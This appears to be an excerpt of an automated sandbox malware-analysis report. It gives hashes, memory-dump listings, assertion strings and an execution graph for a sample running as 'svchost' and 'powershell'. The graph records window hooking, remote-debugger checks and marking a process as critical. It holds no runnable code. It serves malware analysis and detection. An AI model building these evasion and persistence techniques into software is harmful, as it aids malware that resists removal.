                                                                                  • Instruction Fuzzy Hash: 62113C32A15B8696DB40DF2BD4846A83B60FB98B84F085635EF0D47669CF38E5A4CB10
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$Size > 0
                                                                                  • API String ID: 3234217646-525454446
                                                                                  • Opcode ID: 6ca6481d53b11b749ffaf4ca310ee77a5356a2dbcadc9a6686dba35f246cf75d
                                                                                  • Instruction ID: a1cf0bc0b2934341b6f05305adfba26ea1de076e71e2972254f968c67f7bf4c3
                                                                                  • Opcode Fuzzy Hash: 6ca6481d53b11b749ffaf4ca310ee77a5356a2dbcadc9a6686dba35f246cf75d
                                                                                  • Instruction Fuzzy Hash: E3014E31B15A8382E710DB27E88436937A0FB98BC0F445435E61D87B95DF3CD452C700
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6DBE23), ref: 00007FF6AE6E327C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$it >= Data && it < Data + Size
                                                                                  • API String ID: 3234217646-1080069799
                                                                                  • Opcode ID: 614e46c7ea9f5e5f46247c9654c6939ee513c736da83f14011f93ef6b3cc2415
                                                                                  • Instruction ID: ecb4adf709e39bf672ba23aa4d57599c8cf180aefca2b1999b6aa6a2b8158c74
                                                                                  • Opcode Fuzzy Hash: 614e46c7ea9f5e5f46247c9654c6939ee513c736da83f14011f93ef6b3cc2415
                                                                                  • Instruction Fuzzy Hash: 01F0A961B1AE82A5DF145F16E9400B4A721FF65780F8C6531EA4D87294DF6CE994C301
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$GetCurrentWindowRead()->Flags & ImGuiWindowFlags_Tooltip
                                                                                  • API String ID: 3234217646-2898614160
                                                                                  • Opcode ID: d2c6d5cbff15058275cd7bc1f7b4f640aec2d55d8346ef20cc81a6fc229b3152
                                                                                  • Instruction ID: 87be00db05119f0596a45842b8f1096c2ff01442a436a05115172761b9928022
                                                                                  • Opcode Fuzzy Hash: d2c6d5cbff15058275cd7bc1f7b4f640aec2d55d8346ef20cc81a6fc229b3152
                                                                                  • Instruction Fuzzy Hash: BEF0AF21A0AB4691EA00AB06FC401B96765EFA5784F186434FA4C8B6AADF2CD1558740
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF6AE6DD961), ref: 00007FF6AE6EF0BF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$off >= 4 && off < Buf.Size
                                                                                  • API String ID: 3234217646-1359562212
                                                                                  • Opcode ID: f201d3088d68ff935765ebd9640bd6bb3196cbe8d118d8bd67d5335e91680413
                                                                                  • Instruction ID: 4ac77a68042ab3da3ccb3c6c4b1b065d5d4c2e2effc438f0ddfa7f0b08cd191d
                                                                                  • Opcode Fuzzy Hash: f201d3088d68ff935765ebd9640bd6bb3196cbe8d118d8bd67d5335e91680413
                                                                                  • Instruction Fuzzy Hash: 47F0B431A2AB42C3FA189B16E9C44783321FF25B54F543431EA2D872E0CF2DF4A28B00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-608382026
                                                                                  • Opcode ID: 57dd31fc503d924cde897e5fe176e93a08711d3e1d5f8de211c532e618b2d598
                                                                                  • Instruction ID: e4161f649fd282b0515aa31c19c85a4a8881453b97662cdc9f593485386bf838
                                                                                  • Opcode Fuzzy Hash: 57dd31fc503d924cde897e5fe176e93a08711d3e1d5f8de211c532e618b2d598
                                                                                  • Instruction Fuzzy Hash: 47E09B51F166C6D1EB105F17E4411182350EB24B44F891436D90D87390CF6CD496C714
                                                                                  APIs
                                                                                  Strings
                                                                                  • GImGui != 0 && "No current context. Did you call ImGui::CreateContext() and ImGui::SetCurrentContext() ?", xrefs: 00007FF6AE6D543D
                                                                                  • D:\ALLLLREALSHY\src\, xrefs: 00007FF6AE6D5436
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$GImGui != 0 && "No current context. Did you call ImGui::CreateContext() and ImGui::SetCurrentContext() ?"
                                                                                  • API String ID: 3234217646-3314611915
                                                                                  • Opcode ID: 87429faaa356be672c8e1a658df27c9c35909c8f709695837c749cf8790cce4e
                                                                                  • Instruction ID: c4e91b6b925b77162f6321e1b61f7a4c24d23b705d1607d53377ee5394033345
                                                                                  • Opcode Fuzzy Hash: 87429faaa356be672c8e1a658df27c9c35909c8f709695837c749cf8790cce4e
                                                                                  • Instruction Fuzzy Hash: A8E01794F1BB0292EE11BB0BEC813302220BF34785F802471E90E83760EE2CE1168710
                                                                                  APIs
                                                                                  Strings
                                                                                  • GImGui != 0 && "No current context. Did you call ImGui::CreateContext() and ImGui::SetCurrentContext() ?", xrefs: 00007FF6AE6D92DD
                                                                                  • D:\ALLLLREALSHY\src\, xrefs: 00007FF6AE6D92D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$GImGui != 0 && "No current context. Did you call ImGui::CreateContext() and ImGui::SetCurrentContext() ?"
                                                                                  • API String ID: 3234217646-3314611915
                                                                                  • Opcode ID: 8ea31ae30b146ec3c8c93f6900c9f4e8145d1f7d355261a0e765603db6d933e6
                                                                                  • Instruction ID: cf4cb3e56b70f99ef0fc0718dc27412b0519e462cd78d622e9253b96f7a2aeac
                                                                                  • Opcode Fuzzy Hash: 8ea31ae30b146ec3c8c93f6900c9f4e8145d1f7d355261a0e765603db6d933e6
                                                                                  • Instruction Fuzzy Hash: 31D017A4F2BB4291EE00AF0BEC812702320BF34745F802471F90E83360EE6CA1168B10

                                                                                  Execution Graph

                                                                                  Execution Coverage:23.6%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:7.3%
                                                                                  Total number of Nodes:41
                                                                                  Total number of Limit Nodes:4
                                                                                  execution_graph 7354 7ffd34889da8 7355 7ffd34889db1 SetWindowsHookExW 7354->7355 7357 7ffd34889e81 7355->7357 7394 7ffd34887a81 7395 7ffd34887a9f CheckRemoteDebuggerPresent 7394->7395 7397 7ffd34887b3f 7395->7397 7398 7ffd3488b27e 7399 7ffd3488b2bf 7398->7399 7400 7ffd34889858 RtlSetProcessIsCritical 7399->7400 7401 7ffd3488b2e0 7400->7401 7402 7ffd34889868 RtlSetProcessIsCritical 7401->7402 7403 7ffd3488b2ec 7402->7403 7404 7ffd34888bf2 7405 7ffd34888bff RtlSetProcessIsCritical 7404->7405 7407 7ffd34889962 7405->7407 7358 7ffd3488a594 7359 7ffd3488a59d 7358->7359 7369 7ffd3488a659 7359->7369 7370 7ffd34889848 7359->7370 7372 7ffd34889851 7370->7372 7371 7ffd3488989c 7372->7371 7373 7ffd34889902 RtlSetProcessIsCritical 7372->7373 7374 7ffd34889962 7373->7374 7375 7ffd34889858 7374->7375 7377 7ffd34889861 7375->7377 7376 7ffd3488989c 7377->7376 7378 7ffd34889902 RtlSetProcessIsCritical 7377->7378 7379 7ffd34889962 7378->7379 7380 7ffd34889868 7379->7380 7381 7ffd34889871 7380->7381 7382 7ffd3488989c 7381->7382 7383 7ffd34889902 RtlSetProcessIsCritical 7381->7383 7384 7ffd34889962 7383->7384 7385 7ffd34889878 7384->7385 7387 7ffd3488987e 7385->7387 7386 7ffd3488989c 7387->7386 7388 7ffd34889902 RtlSetProcessIsCritical 7387->7388 7389 7ffd34889962 7388->7389 7390 7ffd34889888 7389->7390 7391 7ffd34889891 RtlSetProcessIsCritical 7390->7391 7393 7ffd34889962 7391->7393 7393->7369

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 831 7ffd34887a81-7ffd34887b3d CheckRemoteDebuggerPresent 835 7ffd34887b3f 831->835 836 7ffd34887b45-7ffd34887b88 831->836 835->836
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3410399773.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ffd34880000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                  • String ID:
                                                                                  • API String ID: 3662101638-0
                                                                                  • Opcode ID: 445d335dac86f44b064524e5a2c1582e2c8f59540b9f4b1e34cc651c3bae9705
                                                                                  • Instruction ID: 7152d1c932a78aa301b34f1e728c376502f24c54ce2496c954502b0517a1992f
                                                                                  • Opcode Fuzzy Hash: 445d335dac86f44b064524e5a2c1582e2c8f59540b9f4b1e34cc651c3bae9705
                                                                                  • Instruction Fuzzy Hash: 6631E43190875C8FCB58DF98C8966E97BE0FF65321F05416AD449D7242DB34A846CB91

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3410399773.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ffd34880000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalProcess
                                                                                  • String ID: O_^
                                                                                  • API String ID: 2695349919-3627497092
                                                                                  • Opcode ID: 1e0d6776342d965826f658097a84c1bf7eea8d178d514110f758b6d01709b6f6
                                                                                  • Instruction ID: 6321827e8fb6cccda8c254879827f0ceb35e94a714ae209397d9dccf6487cef6
                                                                                  • Opcode Fuzzy Hash: 1e0d6776342d965826f658097a84c1bf7eea8d178d514110f758b6d01709b6f6
                                                                                  • Instruction Fuzzy Hash: B931023190CA488FDB29DBA8D8956F9BBE0FF56311F04412ED08AD3682CB346842CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 765 7ffd34889838-7ffd3488983f 766 7ffd34889841-7ffd34889846 765->766
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3410399773.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ffd34880000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2695349919-0
                                                                                  • Opcode ID: f700af5116b78771cb9cd862f747d025cbf3ca9322c227b48e032cc3f47cb696
                                                                                  • Instruction ID: 4e316f94acfca9647c6e51e9e3be0241b1c113407e7f3cd8b88e30e9a7f46201
                                                                                  • Opcode Fuzzy Hash: f700af5116b78771cb9cd862f747d025cbf3ca9322c227b48e032cc3f47cb696
                                                                                  • Instruction Fuzzy Hash: B151F831A0D7894FD766DBA888556A97FE0FF57310F0800BFD089D7193DA28A846DB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 767 7ffd34889858-7ffd3488987a 770 7ffd3488987c-7ffd3488987f 767->770 771 7ffd3488987e-7ffd3488987f 767->771 772 7ffd34889881-7ffd34889884 770->772 771->772 773 7ffd34889886-7ffd34889960 RtlSetProcessIsCritical 772->773 774 7ffd3488989c 772->774 782 7ffd34889968-7ffd3488999d 773->782 783 7ffd34889962 773->783 783->782
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3410399773.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ffd34880000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2695349919-0
                                                                                  • Opcode ID: b2458370c580b1227a797e9c387eb33bb312a2915c368ed5c1667d2fd26b1219
                                                                                  • Instruction ID: 0be6338b331b4297f4ef8f723eadfd64075cdb0470968c6c73401979efcb0c85
                                                                                  • Opcode Fuzzy Hash: b2458370c580b1227a797e9c387eb33bb312a2915c368ed5c1667d2fd26b1219
                                                                                  • Instruction Fuzzy Hash: EA41F731A0D7898FD769DBAC98956E9BBE0FF56310F04407FD089D7183DA28A846DB81

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 785 7ffd34889868-7ffd3488987a 787 7ffd3488987c-7ffd3488987f 785->787 788 7ffd3488987e-7ffd3488987f 785->788 789 7ffd34889881-7ffd34889884 787->789 788->789 790 7ffd34889886-7ffd34889960 RtlSetProcessIsCritical 789->790 791 7ffd3488989c 789->791 799 7ffd34889968-7ffd3488999d 790->799 800 7ffd34889962 790->800 800->799
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3410399773.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ffd34880000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2695349919-0
                                                                                  • Opcode ID: 4bdf92a40c4aa6a70b3e29a2a97c8a9d0af14b416ed5d258d5a0d8a93b277353
                                                                                  • Instruction ID: 38f56caeac7e81a8e526d0b9f6f8fc64c5d7ced57702163c49d7ff53c50c1f77
                                                                                  • Opcode Fuzzy Hash: 4bdf92a40c4aa6a70b3e29a2a97c8a9d0af14b416ed5d258d5a0d8a93b277353
                                                                                  • Instruction Fuzzy Hash: 7B41F731A0C7498FDB69DB9C98556E97BF0FF56310F04017ED08AD3182DB38A846DB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 802 7ffd34889878-7ffd34889884 805 7ffd34889886-7ffd34889960 RtlSetProcessIsCritical 802->805 806 7ffd3488989c 802->806 814 7ffd34889968-7ffd3488999d 805->814 815 7ffd34889962 805->815 815->814
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3410399773.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ffd34880000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2695349919-0
                                                                                  • Opcode ID: 52cedab8eaf95ac99c4fc36e2cc054161df66a2558bc1e144a4fc7f215eb01e8
                                                                                  • Instruction ID: a5600ec3a73ac3d136ff2ad4db2aee9110a5b3a6777af8746e7fc6b8ae0553d4
                                                                                  • Opcode Fuzzy Hash: 52cedab8eaf95ac99c4fc36e2cc054161df66a2558bc1e144a4fc7f215eb01e8
                                                                                  • Instruction Fuzzy Hash: 3941E63190C7598FDB69DB9C98956E97BE0FF56311F04017ED08AD3282DA386846CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 817 7ffd34889da8-7ffd34889daf 818 7ffd34889dba-7ffd34889e2d 817->818 819 7ffd34889db1-7ffd34889db9 817->819 823 7ffd34889eb9-7ffd34889ebd 818->823 824 7ffd34889e33-7ffd34889e40 818->824 819->818 825 7ffd34889e42-7ffd34889e7f SetWindowsHookExW 823->825 824->825 827 7ffd34889e87-7ffd34889eb8 825->827 828 7ffd34889e81 825->828 828->827
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3410399773.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ffd34880000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID: HookWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2559412058-0
                                                                                  • Opcode ID: 88916dc712f3932ca02bdfc70c12bcba6be5bd02a210095dd3732610d2701559
                                                                                  • Instruction ID: c7348c86144b5637ec66aeb97c9f48f5fa523e2473e9fb545025158c9cb178ee
                                                                                  • Opcode Fuzzy Hash: 88916dc712f3932ca02bdfc70c12bcba6be5bd02a210095dd3732610d2701559
                                                                                  • Instruction Fuzzy Hash: B3311B30A1CA5C4FDB58EB9C98566F9BBE1EB5A321F00023ED009D3292CF756812CBC1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2261341230.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd348b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2bf59500b7fc446c8fc1504f5c9265861199946736c52940ac72f2196963880f
                                                                                  • Instruction ID: def04895664daedddb34684333ababd275e9e9b0e37e34b896cd822bfc172bd1
                                                                                  • Opcode Fuzzy Hash: 2bf59500b7fc446c8fc1504f5c9265861199946736c52940ac72f2196963880f
                                                                                  • Instruction Fuzzy Hash: F2312A7191CF489FDB189F5C98466E97BE0FB99310F04812FE449C3252DB74A812CBC2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2260677888.00007FFD3479D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3479D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd3479d000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c3f411ba889929acda00995ccd1099ebb500b0921effbcb1ba078837518ee014
                                                                                  • Instruction ID: a774f2b9bf1851806dc352566f1a0410b0af83e4b5c17d13c1855f3a190feb2d
                                                                                  • Opcode Fuzzy Hash: c3f411ba889929acda00995ccd1099ebb500b0921effbcb1ba078837518ee014
                                                                                  • Instruction Fuzzy Hash: B041397140DBC48FE7569B289855A523FF0EF57320B1505EFD088CB1A3D629B846C7D2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2261341230.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd348b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8a9b8314d3abc4333c1ab53b5ec4483a2bc05fa84135b1dcd8550166ba9ac13c
                                                                                  • Instruction ID: aa8fd972de3eee931288789169bdbce96febf9abadc7afb9727d6a27df502cd7
                                                                                  • Opcode Fuzzy Hash: 8a9b8314d3abc4333c1ab53b5ec4483a2bc05fa84135b1dcd8550166ba9ac13c
                                                                                  • Instruction Fuzzy Hash: 3F21F63190CB4C4FDB59DFAC988A7E97FF0EB96321F04416BD048C3152DA74A81ACB92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2261877810.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd34980000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d57f74cadb5b929bd8e53d20cde03b0c2fc4168634a506ca5d2c6c085258e194
                                                                                  • Instruction ID: a71516bffc732d3c06ba3a2307b05d5911d2af7bff9e7e220df720d857e1b84e
                                                                                  • Opcode Fuzzy Hash: d57f74cadb5b929bd8e53d20cde03b0c2fc4168634a506ca5d2c6c085258e194
                                                                                  • Instruction Fuzzy Hash: B4110632B0D68C4FEB95EA9C40E41A87BD2EF5A310F0440BEC54CDB097CD29AC45C360
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2261341230.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd348b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                  • Instruction ID: deb5d86c88e8f26112380754d293aded1f7c495d532cba5f2c16f698bcc23440
                                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
